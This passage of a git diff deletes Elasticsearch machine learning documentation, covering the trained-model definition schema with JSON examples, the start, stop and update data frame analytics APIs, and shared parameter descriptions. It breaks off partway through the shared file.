-`field`::: -(Required, string) -The field name to encode. - -`target_map`::: -(Required, object map of string:double) -Object that maps the field value to the target mean value. - -`custom`:: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-preprocessor] - -====== -//End target mean encoding -===== -//End preprocessors - -//Begin trained model -`trained_model`:: -(Required, object) -The definition of the trained model. -+ -.Properties of `trained_model` -[%collapsible%open] -===== -//Begin tree -`tree`:: -(Required, object) -The definition for a binary decision tree. -+ -.Properties of `tree` -[%collapsible%open] -====== -`classification_labels`::: -(Optional, string) An array of classification labels (used for -`classification`). - -`feature_names`::: -(Required, string) -Features expected by the tree, in their expected order. - -`target_type`::: -(Required, string) -String indicating the model target type; `regression` or `classification`. - -`tree_structure`::: -(Required, object) -An array of `tree_node` objects. The nodes must be in ordinal order by their -`tree_node.node_index` value. -====== -//End tree - -//Begin tree node -`tree_node`:: -(Required, object) -The definition of a node in a tree. -+ --- -There are two major types of nodes: leaf nodes and not-leaf nodes. - -* Leaf nodes only need `node_index` and `leaf_value` defined. -* All other nodes need `split_feature`, `left_child`, `right_child`, - `threshold`, `decision_type`, and `default_left` defined. --- -+ -.Properties of `tree_node` -[%collapsible%open] -====== -`decision_type`:: -(Optional, string) -Indicates the positive value (in other words, when to choose the left node) -decision type. Supported `lt`, `lte`, `gt`, `gte`. Defaults to `lte`. - -`default_left`:: -(Optional, Boolean) -Indicates whether to default to the left when the feature is missing. Defaults -to `true`. - -`leaf_value`:: -(Optional, double) -The leaf value of the of the node, if the value is a leaf (in other words, no -children). - -`left_child`:: -(Optional, integer) -The index of the left child. - -`node_index`:: -(Integer) -The index of the current node. - -`right_child`:: -(Optional, integer) -The index of the right child. - -`split_feature`:: -(Optional, integer) -The index of the feature value in the feature array. - -`split_gain`:: -(Optional, double) The information gain from the split. - -`threshold`:: -(Optional, double) -The decision threshold with which to compare the feature value. -====== -//End tree node - -//Begin ensemble -`ensemble`:: -(Optional, object) -The definition for an ensemble model. See <>. -+ -.Properties of `ensemble` -[%collapsible%open] -====== -//Begin aggregate output -`aggregate_output`:: -(Required, object) -An aggregated output object that defines how to aggregate the outputs of the -`trained_models`. Supported objects are `weighted_mode`, `weighted_sum`, and -`logistic_regression`. See <>. -+ -.Properties of `aggregate_output` -[%collapsible%open] -======= -//Begin logistic regression -`logistic_regression`:: -(Optional, object) -This `aggregated_output` type works with binary classification (classification -for values [0, 1]). It multiplies the outputs (in the case of the `ensemble` -model, the inference model values) by the supplied `weights`. The resulting -vector is summed and passed to a -{wikipedia}/Sigmoid_function[`sigmoid` function]. The result -of the `sigmoid` function is considered the probability of class 1 (`P_1`), -consequently, the probability of class 0 is `1 - P_1`. The class with the -highest probability (either 0 or 1) is then returned. For more information about -logistic regression, see -{wikipedia}/Logistic_regression[this wiki article]. -+ -.Properties of `logistic_regression` -[%collapsible%open] -======== -`weights`::: -(Required, double) -The weights to multiply by the input values (the inference values of the trained -models). -======== -//End logistic regression - -//Begin weighted sum -`weighted_sum`:: -(Optional, object) -This `aggregated_output` type works with regression. The weighted sum of the -input values. -+ -.Properties of `weighted_sum` -[%collapsible%open] -======== -`weights`::: -(Required, double) -The weights to multiply by the input values (the inference values of the trained -models). -======== -//End weighted sum - -//Begin weighted mode -`weighted_mode`:: -(Optional, object) -This `aggregated_output` type works with regression or classification. It takes -a weighted vote of the input values. The most common input value (taking the -weights into account) is returned. -+ -.Properties of `weighted_mode` -[%collapsible%open] -======== -`weights`::: -(Required, double) -The weights to multiply by the input values (the inference values of the trained -models). -======== -//End weighted mode - -//Begin exponent -`exponent`:: -(Optional, object) -This `aggregated_output` type works with regression. It takes a weighted sum of -the input values and passes the result to an exponent function -(`e^x` where `x` is the sum of the weighted values). -+ -.Properties of `exponent` -[%collapsible%open] -======== -`weights`::: -(Required, double) -The weights to multiply by the input values (the inference values of the trained -models). -======== -//End exponent -======= -//End aggregate output - -`classification_labels`:: -(Optional, string) -An array of classification labels. - -`feature_names`:: -(Optional, string) -Features expected by the ensemble, in their expected order. - -`target_type`:: -(Required, string) -String indicating the model target type; `regression` or `classification.` - -`trained_models`:: -(Required, object) -An array of `trained_model` objects. Supported trained models are `tree` and -`ensemble`. -====== -//End ensemble - -===== -//End trained model - -==== -//End definition - -`description`:: -(Optional, string) -A human-readable description of the {infer} trained model. - -//Begin inference_config -`inference_config`:: -(Required, object) -The default configuration for inference. This can be either a `regression` -or `classification` configuration. It must match the underlying -`definition.trained_model`'s `target_type`. -+ -.Properties of `inference_config` -[%collapsible%open] -==== -`regression`::: -(Optional, object) -Regression configuration for inference. -+ -.Properties of regression inference -[%collapsible%open] -===== -`num_top_feature_importance_values`:::: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-regression-num-top-feature-importance-values] - -`results_field`:::: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-results-field] -===== - -`classification`::: -(Optional, object) -Classification configuration for inference. -+ -.Properties of classification inference -[%collapsible%open] -===== -`num_top_classes`:::: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-num-top-classes] - -`num_top_feature_importance_values`:::: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-num-top-feature-importance-values] - -`prediction_field_type`:::: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-prediction-field-type] - -`results_field`:::: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-results-field] - -`top_classes_results_field`:::: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-top-classes-results-field] -===== -==== -//End of inference_config - -//Begin input -`input`:: -(Required, object) -The input field names for the model definition. -+ -.Properties of `input` -[%collapsible%open] -==== -`field_names`::: -(Required, string) -An array of input field names for the model. -==== -//End input - -`metadata`:: -(Optional, object) -An object map that contains metadata about the model. - -`tags`:: -(Optional, string) -An array of tags to organize the model. - - -[[ml-put-trained-models-example]] -== {api-examples-title} - -[[ml-put-trained-models-preprocessor-example]] -=== Preprocessor examples - -The example below shows a `frequency_encoding` preprocessor object: - -[source,js] ----------------------------------- -{ - "frequency_encoding":{ - "field":"FlightDelayType", - "feature_name":"FlightDelayType_frequency", - "frequency_map":{ - "Carrier Delay":0.6007414737092798, - "NAS Delay":0.6007414737092798, - "Weather Delay":0.024573576178086153, - "Security Delay":0.02476631010889467, - "No Delay":0.6007414737092798, - "Late Aircraft Delay":0.6007414737092798 - } - } -} ----------------------------------- -//NOTCONSOLE - - -The next example shows a `one_hot_encoding` preprocessor object: - -[source,js] ----------------------------------- -{ - "one_hot_encoding":{ - "field":"FlightDelayType", - "hot_map":{ - "Carrier Delay":"FlightDelayType_Carrier Delay", - "NAS Delay":"FlightDelayType_NAS Delay", - "No Delay":"FlightDelayType_No Delay", - "Late Aircraft Delay":"FlightDelayType_Late Aircraft Delay" - } - } -} ----------------------------------- -//NOTCONSOLE - - -This example shows a `target_mean_encoding` preprocessor object: - -[source,js] ----------------------------------- -{ - "target_mean_encoding":{ - "field":"FlightDelayType", - "feature_name":"FlightDelayType_targetmean", - "target_map":{ - "Carrier Delay":39.97465788139886, - "NAS Delay":39.97465788139886, - "Security Delay":203.171206225681, - "Weather Delay":187.64705882352948, - "No Delay":39.97465788139886, - "Late Aircraft Delay":39.97465788139886 - }, - "default_value":158.17995752420433 - } -} ----------------------------------- -//NOTCONSOLE - - -[[ml-put-trained-models-model-example]] -=== Model examples - -The first example shows a `trained_model` object: - -[source,js] ----------------------------------- -{ - "tree":{ - "feature_names":[ - "DistanceKilometers", - "FlightTimeMin", - "FlightDelayType_NAS Delay", - "Origin_targetmean", - "DestRegion_targetmean", - "DestCityName_targetmean", - "OriginAirportID_targetmean", - "OriginCityName_frequency", - "DistanceMiles", - "FlightDelayType_Late Aircraft Delay" - ], - "tree_structure":[ - { - "decision_type":"lt", - "threshold":9069.33437193022, - "split_feature":0, - "split_gain":4112.094574306927, - "node_index":0, - "default_left":true, - "left_child":1, - "right_child":2 - }, - ... - { - "node_index":9, - "leaf_value":-27.68987349695448 - }, - ... - ], - "target_type":"regression" - } -} ----------------------------------- -//NOTCONSOLE - - -The following example shows an `ensemble` model object: - -[source,js] ----------------------------------- -"ensemble":{ - "feature_names":[ - ... - ], - "trained_models":[ - { - "tree":{ - "feature_names":[], - "tree_structure":[ - { - "decision_type":"lte", - "node_index":0, - "leaf_value":47.64069875778043, - "default_left":false - } - ], - "target_type":"regression" - } - }, - ... - ], - "aggregate_output":{ - "weighted_sum":{ - "weights":[ - ... - ] - } - }, - "target_type":"regression" -} ----------------------------------- -//NOTCONSOLE - - -[[ml-put-trained-models-aggregated-output-example]] -=== Aggregated output example - -Example of a `logistic_regression` object: - -[source,js] ----------------------------------- -"aggregate_output" : { - "logistic_regression" : { - "weights" : [2.0, 1.0, .5, -1.0, 5.0, 1.0, 1.0] - } -} ----------------------------------- -//NOTCONSOLE - - -Example of a `weighted_sum` object: - -[source,js] ----------------------------------- -"aggregate_output" : { - "weighted_sum" : { - "weights" : [1.0, -1.0, .5, 1.0, 5.0] - } -} ----------------------------------- -//NOTCONSOLE - - -Example of a `weighted_mode` object: - -[source,js] ----------------------------------- -"aggregate_output" : { - "weighted_mode" : { - "weights" : [1.0, 1.0, 1.0, 1.0, 1.0] - } -} ----------------------------------- -//NOTCONSOLE - - -Example of an `exponent` object: - -[source,js] ----------------------------------- -"aggregate_output" : { - "exponent" : { - "weights" : [1.0, 1.0, 1.0, 1.0, 1.0] - } -} ----------------------------------- -//NOTCONSOLE - - -[[ml-put-trained-models-json-schema]] -=== Trained models JSON schema - -For the full JSON schema of trained models, -https://github.com/elastic/ml-json-schemas[click here]. diff --git a/docs/reference/ml/df-analytics/apis/start-dfanalytics.asciidoc b/docs/reference/ml/df-analytics/apis/start-dfanalytics.asciidoc deleted file mode 100644 index 8536e6c356f..00000000000 --- a/docs/reference/ml/df-analytics/apis/start-dfanalytics.asciidoc +++ /dev/null @@ -1,98 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[start-dfanalytics]] -= Start {dfanalytics-jobs} API - -[subs="attributes"] -++++ -Start {dfanalytics-jobs} -++++ - -Starts a {dfanalytics-job}. - -experimental[] - -[[ml-start-dfanalytics-request]] -== {api-request-title} - -`POST _ml/data_frame/analytics//_start` - -[[ml-start-dfanalytics-prereq]] -== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the following built-in roles and privileges: - -* `machine_learning_admin` -* source indices: `read`, `view_index_metadata` -* destination index: `read`, `create_index`, `manage` and `index` - -For more information, see <>, <>, and -{ml-docs-setup-privileges}. - -[[ml-start-dfanalytics-desc]] -== {api-description-title} - -A {dfanalytics-job} can be started and stopped multiple times throughout its -lifecycle. - -If the destination index does not exist, it is created automatically the first -time you start the {dfanalytics-job}. The `index.number_of_shards` and -`index.number_of_replicas` settings for the destination index are copied from -the source index. If there are multiple source indices, the destination index -copies the highest setting values. The mappings for the destination index are -also copied from the source indices. If there are any mapping conflicts, the job -fails to start. - -If the destination index exists, it is used as is. You can therefore set up the -destination index in advance with custom settings and mappings. - -IMPORTANT: When {es} {security-features} are enabled, the {dfanalytics-job} -remembers which user created it and runs the job using those credentials. If you -provided <> -when you created the job, those credentials are used. - -[[ml-start-dfanalytics-path-params]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-data-frame-analytics-define] - -[[ml-start-dfanalytics-query-params]] -== {api-query-parms-title} - -`timeout`:: -(Optional, <>) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=timeout-start] - -[[ml-start-dfanalytics-response-body]] -== {api-response-body-title} - -`acknowledged`:: - (Boolean) For a successful response, this value is always `true`. On failure, an - exception is returned instead. - -`node`:: - (string) The ID of the node that the job was started on. - If the job is allowed to open lazily and has not yet been assigned to a node, this value is an empty string. - -[[ml-start-dfanalytics-example]] -== {api-examples-title} - -The following example starts the `loganalytics` {dfanalytics-job}: - -[source,console] --------------------------------------------------- -POST _ml/data_frame/analytics/loganalytics/_start --------------------------------------------------- -// TEST[skip:setup:logdata_job] - -When the {dfanalytics-job} starts, you receive the following results: - -[source,console-result] ----- -{ - "acknowledged" : true, - "node" : "node-1" -} ----- diff --git a/docs/reference/ml/df-analytics/apis/stop-dfanalytics.asciidoc b/docs/reference/ml/df-analytics/apis/stop-dfanalytics.asciidoc deleted file mode 100644 index 56dc7497e05..00000000000 --- a/docs/reference/ml/df-analytics/apis/stop-dfanalytics.asciidoc +++ /dev/null @@ -1,86 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[stop-dfanalytics]] -= Stop {dfanalytics-jobs} API - -[subs="attributes"] -++++ -Stop {dfanalytics-jobs} -++++ - -Stops one or more {dfanalytics-jobs}. - -experimental[] - -[[ml-stop-dfanalytics-request]] -== {api-request-title} - -`POST _ml/data_frame/analytics//_stop` + - -`POST _ml/data_frame/analytics/,/_stop` + - -`POST _ml/data_frame/analytics/_all/_stop` - -[[ml-stop-dfanalytics-prereq]] -== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the following built-in roles or equivalent privileges: - -* `machine_learning_admin` - -For more information, see <> and {ml-docs-setup-privileges}. - - -[[ml-stop-dfanalytics-desc]] -== {api-description-title} - -A {dfanalytics-job} can be started and stopped multiple times throughout its -lifecycle. - -You can stop multiple {dfanalytics-jobs} in a single API request by using a -comma-separated list of {dfanalytics-jobs} or a wildcard expression. You can -stop all {dfanalytics-job} by using _all or by specifying * as the -. - -[[ml-stop-dfanalytics-path-params]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-data-frame-analytics-define] - -[[ml-stop-dfanalytics-query-params]] -== {api-query-parms-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-no-match] - - -`force`:: - (Optional, Boolean) If true, the {dfanalytics-job} is stopped forcefully. - -`timeout`:: -(Optional, <>) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=timeout-stop] - - -[[ml-stop-dfanalytics-example]] -== {api-examples-title} - -The following example stops the `loganalytics` {dfanalytics-job}: - -[source,console] --------------------------------------------------- -POST _ml/data_frame/analytics/loganalytics/_stop --------------------------------------------------- -// TEST[skip:TBD] - -When the {dfanalytics-job} stops, you receive the following results: - -[source,console-result] ----- -{ - "stopped" : true -} ----- diff --git a/docs/reference/ml/df-analytics/apis/update-dfanalytics.asciidoc b/docs/reference/ml/df-analytics/apis/update-dfanalytics.asciidoc deleted file mode 100644 index 1de505f06ae..00000000000 --- a/docs/reference/ml/df-analytics/apis/update-dfanalytics.asciidoc +++ /dev/null @@ -1,103 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[update-dfanalytics]] -= Update {dfanalytics-jobs} API -[subs="attributes"] -++++ -Update {dfanalytics-jobs} -++++ - -Updates an existing {dfanalytics-job}. - -experimental[] - -[[ml-update-dfanalytics-request]] -== {api-request-title} - -`POST _ml/data_frame/analytics//_update` - - -[[ml-update-dfanalytics-prereq]] -== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the following -built-in roles and privileges: - -* `machine_learning_admin` -* source indices: `read`, `view_index_metadata` -* destination index: `read`, `create_index`, `manage` and `index` - -For more information, see <>, <>, and -{ml-docs-setup-privileges}. - -NOTE: The {dfanalytics-job} remembers which roles the user who updated it had at -the time of the update. When you start the job, it performs the analysis using -those same roles. If you provide -<>, -those credentials are used instead. - -[[ml-update-dfanalytics-desc]] -== {api-description-title} - -This API updates an existing {dfanalytics-job} that performs an analysis on the source -indices and stores the outcome in a destination index. - - -[[ml-update-dfanalytics-path-params]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-data-frame-analytics-define] - -[role="child_attributes"] -[[ml-update-dfanalytics-request-body]] -== {api-request-body-title} - -`allow_lazy_start`:: -(Optional, Boolean) -Specifies whether this job can start when there is insufficient {ml} node -capacity for it to be immediately assigned to a node. The default is `false`; if -a {ml} node with capacity to run the job cannot immediately be found, the API -returns an error. However, this is also subject to the cluster-wide -`xpack.ml.max_lazy_ml_nodes` setting. See <>. If this -option is set to `true`, the API does not return an error and the job waits in -the `starting` state until sufficient {ml} node capacity is available. - -`description`:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=description-dfa] - -`max_num_threads`:: -(Optional, integer) -The maximum number of threads to be used by the analysis. -The default value is `1`. Using more threads may decrease the time -necessary to complete the analysis at the cost of using more CPU. -Note that the process may use additional threads for operational -functionality other than the analysis itself. - -`model_memory_limit`:: -(Optional, string) -The approximate maximum amount of memory resources that are permitted for -analytical processing. The default value for {dfanalytics-jobs} is `1gb`. If -your `elasticsearch.yml` file contains an `xpack.ml.max_model_memory_limit` -setting, an error occurs when you try to create {dfanalytics-jobs} that have -`model_memory_limit` values greater than that setting. For more information, see -<>. - -[[ml-update-dfanalytics-example]] -== {api-examples-title} - -[[ml-update-dfanalytics-example-preprocess]] -=== Updating model memory limit example - -The following example shows how to update the model memory limit for the existing {dfanalytics} configuration. - -[source,console] --------------------------------------------------- -POST _ml/data_frame/analytics/model-flight-delays/_update -{ - "model_memory_limit": "200mb" -} --------------------------------------------------- -// TEST[skip:setup kibana sample data] diff --git a/docs/reference/ml/images/ml-category-advanced.jpg b/docs/reference/ml/images/ml-category-advanced.jpg deleted file mode 100644 index 0a862903c0b..00000000000 Binary files a/docs/reference/ml/images/ml-category-advanced.jpg and /dev/null differ diff --git a/docs/reference/ml/images/ml-category-analyzer.jpg b/docs/reference/ml/images/ml-category-analyzer.jpg deleted file mode 100644 index e9c4842a0de..00000000000 Binary files a/docs/reference/ml/images/ml-category-analyzer.jpg and /dev/null differ diff --git a/docs/reference/ml/images/ml-category-anomalies.jpg b/docs/reference/ml/images/ml-category-anomalies.jpg deleted file mode 100644 index fcbd0454886..00000000000 Binary files a/docs/reference/ml/images/ml-category-anomalies.jpg and /dev/null differ diff --git a/docs/reference/ml/images/ml-category-wizard.jpg b/docs/reference/ml/images/ml-category-wizard.jpg deleted file mode 100644 index eb78a3d51b5..00000000000 Binary files a/docs/reference/ml/images/ml-category-wizard.jpg and /dev/null differ diff --git a/docs/reference/ml/images/ml-create-job.jpg b/docs/reference/ml/images/ml-create-job.jpg deleted file mode 100644 index 506f3d8ea3c..00000000000 Binary files a/docs/reference/ml/images/ml-create-job.jpg and /dev/null differ diff --git a/docs/reference/ml/images/ml-create-jobs.jpg b/docs/reference/ml/images/ml-create-jobs.jpg deleted file mode 100644 index 0c37ea2c9ff..00000000000 Binary files a/docs/reference/ml/images/ml-create-jobs.jpg and /dev/null differ diff --git a/docs/reference/ml/images/ml-customurl-edit.gif b/docs/reference/ml/images/ml-customurl-edit.gif deleted file mode 100644 index e32312fb643..00000000000 Binary files a/docs/reference/ml/images/ml-customurl-edit.gif and /dev/null differ diff --git a/docs/reference/ml/images/ml-customurl.jpg b/docs/reference/ml/images/ml-customurl.jpg deleted file mode 100644 index 269b57acec3..00000000000 Binary files a/docs/reference/ml/images/ml-customurl.jpg and /dev/null differ diff --git a/docs/reference/ml/images/ml-data-visualizer.jpg b/docs/reference/ml/images/ml-data-visualizer.jpg deleted file mode 100644 index 11758bab17b..00000000000 Binary files a/docs/reference/ml/images/ml-data-visualizer.jpg and /dev/null differ diff --git a/docs/reference/ml/images/ml-edit-job.jpg b/docs/reference/ml/images/ml-edit-job.jpg deleted file mode 100644 index e6a3e6b1106..00000000000 Binary files a/docs/reference/ml/images/ml-edit-job.jpg and /dev/null differ diff --git a/docs/reference/ml/images/ml-population-anomaly.png b/docs/reference/ml/images/ml-population-anomaly.png deleted file mode 100644 index e2a05733f50..00000000000 Binary files a/docs/reference/ml/images/ml-population-anomaly.png and /dev/null differ diff --git a/docs/reference/ml/images/ml-population-job.png b/docs/reference/ml/images/ml-population-job.png deleted file mode 100644 index bab15230214..00000000000 Binary files a/docs/reference/ml/images/ml-population-job.png and /dev/null differ diff --git a/docs/reference/ml/images/ml-population-results.png b/docs/reference/ml/images/ml-population-results.png deleted file mode 100644 index fcf842ea1d1..00000000000 Binary files a/docs/reference/ml/images/ml-population-results.png and /dev/null differ diff --git a/docs/reference/ml/images/ml-scriptfields.jpg b/docs/reference/ml/images/ml-scriptfields.jpg deleted file mode 100644 index 0c9150734c0..00000000000 Binary files a/docs/reference/ml/images/ml-scriptfields.jpg and /dev/null differ diff --git a/docs/reference/ml/images/ml-stop-feed.jpg b/docs/reference/ml/images/ml-stop-feed.jpg deleted file mode 100644 index 3bf3c64402b..00000000000 Binary files a/docs/reference/ml/images/ml-stop-feed.jpg and /dev/null differ diff --git a/docs/reference/ml/images/ml.jpg b/docs/reference/ml/images/ml.jpg deleted file mode 100644 index 12f427675a1..00000000000 Binary files a/docs/reference/ml/images/ml.jpg and /dev/null differ diff --git a/docs/reference/ml/ml-shared.asciidoc b/docs/reference/ml/ml-shared.asciidoc deleted file mode 100644 index 729321c21f3..00000000000 --- a/docs/reference/ml/ml-shared.asciidoc +++ /dev/null @@ -1,1521 +0,0 @@ -tag::aggregations[] -If set, the {dfeed} performs aggregation searches. Support for aggregations is -limited and should be used only with low cardinality data. For more information, -see -{ml-docs}/ml-configuring-aggregation.html[Aggregating data for faster performance]. -end::aggregations[] - -tag::allow-lazy-open[] -Advanced configuration option. Specifies whether this job can open when there is -insufficient {ml} node capacity for it to be immediately assigned to a node. The -default value is `false`; if a {ml} node with capacity to run the job cannot -immediately be found, the <> returns an -error. However, this is also subject to the cluster-wide -`xpack.ml.max_lazy_ml_nodes` setting; see <>. If this -option is set to `true`, the <> does not -return an error and the job waits in the `opening` state until sufficient {ml} -node capacity is available. -end::allow-lazy-open[] - -tag::allow-no-datafeeds[] -Specifies what to do when the request: -+ --- -* Contains wildcard expressions and there are no {dfeeds} that match. -* Contains the `_all` string or no identifiers and there are no matches. -* Contains wildcard expressions and there are only partial matches. - -The default value is `true`, which returns an empty `datafeeds` array when -there are no matches and the subset of results when there are partial matches. -If this parameter is `false`, the request returns a `404` status code when there -are no matches or only partial matches. --- -end::allow-no-datafeeds[] - -tag::allow-no-jobs[] -Specifies what to do when the request: -+ --- -* Contains wildcard expressions and there are no jobs that match. -* Contains the `_all` string or no identifiers and there are no matches. -* Contains wildcard expressions and there are only partial matches. - -The default value is `true`, which returns an empty `jobs` array -when there are no matches and the subset of results when there are partial -matches. If this parameter is `false`, the request returns a `404` status code -when there are no matches or only partial matches. --- -end::allow-no-jobs[] - -tag::allow-no-match[] - Specifies what to do when the request: -+ --- -* Contains wildcard expressions and there are no {dfanalytics-jobs} that match. -* Contains the `_all` string or no identifiers and there are no matches. -* Contains wildcard expressions and there are only partial matches. - -The default value is `true`, which returns an empty `data_frame_analytics` array -when there are no matches and the subset of results when there are partial -matches. If this parameter is `false`, the request returns a `404` status code -when there are no matches or only partial matches. --- -end::allow-no-match[] - -tag::allow-no-match-models[] -Specifies what to do when the request: -+ --- -* Contains wildcard expressions and there are no models that match. -* Contains the `_all` string or no identifiers and there are no matches. -* Contains wildcard expressions and there are only partial matches. - -The default value is `true`, which returns an empty array when there are no -matches and the subset of results when there are partial matches. If this -parameter is `false`, the request returns a `404` status code when there are no -matches or only partial matches. --- -end::allow-no-match-models[] - -tag::analysis[] -Defines the type of {dfanalytics} you want to perform on your source index. For -example: `outlier_detection`. See <>. -end::analysis[] - -tag::analysis-config[] -The analysis configuration, which specifies how to analyze the data. After you -create a job, you cannot change the analysis configuration; all the properties -are informational. -end::analysis-config[] - -tag::analysis-limits[] -Limits can be applied for the resources required to hold the mathematical models -in memory. These limits are approximate and can be set per job. They do not -control the memory used by other processes, for example the {es} Java processes. -end::analysis-limits[] - -tag::assignment-explanation-anomaly-jobs[] -For open {anomaly-jobs} only, contains messages relating to the selection -of a node to run the job. -end::assignment-explanation-anomaly-jobs[] - -tag::assignment-explanation-datafeeds[] -For started {dfeeds} only, contains messages relating to the selection of a -node. -end::assignment-explanation-datafeeds[] - -tag::assignment-explanation-dfanalytics[] -Contains messages relating to the selection of a node. -end::assignment-explanation-dfanalytics[] - -tag::background-persist-interval[] -Advanced configuration option. The time between each periodic persistence of the -model. The default value is a randomized value between 3 to 4 hours, which -avoids all jobs persisting at exactly the same time. The smallest allowed value -is 1 hour. -+ --- -TIP: For very large models (several GB), persistence could take 10-20 minutes, -so do not set the `background_persist_interval` value too low. - --- -end::background-persist-interval[] - -tag::bucket-allocation-failures-count[] -The number of buckets for which new entities in incoming data were not processed -due to insufficient model memory. This situation is also signified by a -`hard_limit: memory_status` property value. -end::bucket-allocation-failures-count[] - -tag::bucket-count[] -The number of buckets processed. -end::bucket-count[] - -tag::bucket-count-anomaly-jobs[] -The number of bucket results produced by the job. -end::bucket-count-anomaly-jobs[] - -tag::bucket-span[] -The size of the interval that the analysis is aggregated into, typically between -`5m` and `1h`. The default value is `5m`. If the {anomaly-job} uses a {dfeed} -with {ml-docs}/ml-configuring-aggregation.html[aggregations], this value must be -divisible by the interval of the date histogram aggregation. For more -information, see {ml-docs}/ml-buckets.html[Buckets]. -end::bucket-span[] - -tag::bucket-span-results[] -The length of the bucket in seconds. This value matches the `bucket_span` -that is specified in the job. -end::bucket-span-results[] - -tag::bucket-time-exponential-average[] -Exponential moving average of all bucket processing times, in milliseconds. -end::bucket-time-exponential-average[] - -tag::bucket-time-exponential-average-hour[] -Exponentially-weighted moving average of bucket processing times -calculated in a 1 hour time window, in milliseconds. -end::bucket-time-exponential-average-hour[] - -tag::bucket-time-maximum[] -Maximum among all bucket processing times, in milliseconds. -end::bucket-time-maximum[] - -tag::bucket-time-minimum[] -Minimum among all bucket processing times, in milliseconds. -end::bucket-time-minimum[] - -tag::bucket-time-total[] -Sum of all bucket processing times, in milliseconds. -end::bucket-time-total[] - -tag::by-field-name[] -The field used to split the data. In particular, this property is used for -analyzing the splits with respect to their own history. It is used for finding -unusual values in the context of the split. -end::by-field-name[] - -tag::calendar-id[] -A string that uniquely identifies a calendar. -end::calendar-id[] - -tag::categorization-analyzer[] -If `categorization_field_name` is specified, you can also define the analyzer -that is used to interpret the categorization field. This property cannot be used -at the same time as `categorization_filters`. The categorization analyzer -specifies how the categorization field is interpreted by the categorization -process. The syntax is very similar to that used to define the `analyzer` in the -<>. For more information, see -{ml-docs}/ml-configuring-categories.html[Categorizing log messages]. -+ -The `categorization_analyzer` field can be specified either as a string or as an -object. If it is a string it must refer to a -<> or one added by another plugin. If it -is an object it has the following properties: -+ -.Properties of `categorization_analyzer` -[%collapsible%open] -===== -`char_filter`:::: -(array of strings or objects) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=char-filter] - -`tokenizer`:::: -(string or object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=tokenizer] - -`filter`:::: -(array of strings or objects) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=filter] -===== -end::categorization-analyzer[] - -tag::categorization-examples-limit[] -The maximum number of examples stored per category in memory and in the results -data store. The default value is `4`. If you increase this value, more examples -are available, however it requires that you have more storage available. If you -set this value to `0`, no examples are stored. -+ -NOTE: The `categorization_examples_limit` only applies to analysis that uses -categorization. For more information, see -{ml-docs}/ml-configuring-categories.html[Categorizing log messages]. -end::categorization-examples-limit[] - -tag::categorization-field-name[] -If this property is specified, the values of the specified field will be -categorized. The resulting categories must be used in a detector by setting -`by_field_name`, `over_field_name`, or `partition_field_name` to the keyword -`mlcategory`. For more information, see -{ml-docs}/ml-configuring-categories.html[Categorizing log messages]. -end::categorization-field-name[] - -tag::categorization-filters[] -If `categorization_field_name` is specified, you can also define optional -filters. This property expects an array of regular expressions. The expressions -are used to filter out matching sequences from the categorization field values. -You can use this functionality to fine tune the categorization by excluding -sequences from consideration when categories are defined. For example, you can -exclude SQL statements that appear in your log files. For more information, see -{ml-docs}/ml-configuring-categories.html[Categorizing log messages]. This -property cannot be used at the same time as `categorization_analyzer`. If you -only want to define simple regular expression filters that are applied prior to -tokenization, setting this property is the easiest method. If you also want to -customize the tokenizer or post-tokenization filtering, use the -`categorization_analyzer` property instead and include the filters as -`pattern_replace` character filters. The effect is exactly the same. -end::categorization-filters[] - -tag::categorization-status[] -The status of categorization for the job. Contains one of the following values: -+ --- -* `ok`: Categorization is performing acceptably well (or not being used at all). -* `warn`: Categorization is detecting a distribution of categories that suggests -the input data is inappropriate for categorization. Problems could be that there -is only one category, more than 90% of categories are rare, the number of -categories is greater than 50% of the number of categorized documents, there are -no frequently matched categories, or more than 50% of categories are dead. - --- -end::categorization-status[] - -tag::categorized-doc-count[] -The number of documents that have had a field categorized. -end::categorized-doc-count[] - -tag::char-filter[] -One or more <>. In addition to the -built-in character filters, other plugins can provide more character filters. -This property is optional. If it is not specified, no character filters are -applied prior to categorization. If you are customizing some other aspect of the -analyzer and you need to achieve the equivalent of `categorization_filters` -(which are not permitted when some other aspect of the analyzer is customized), -add them here as -<>. -end::char-filter[] - -tag::chunking-config[] -{dfeeds-cap} might be required to search over long time periods, for several -months or years. This search is split into time chunks in order to ensure the -load on {es} is managed. Chunking configuration controls how the size of these -time chunks are calculated and is an advanced configuration option. -+ -.Properties of `chunking_config` -[%collapsible%open] -==== -`mode`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=mode] - -`time_span`::: -(<>) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=time-span] -==== -end::chunking-config[] - -tag::class-assignment-objective[] -Defines the objective to optimize when assigning class labels: -`maximize_accuracy` or `maximize_minimum_recall`. When maximizing accuracy, -class labels are chosen to maximize the number of correct predictions. When -maximizing minimum recall, labels are chosen to maximize the minimum 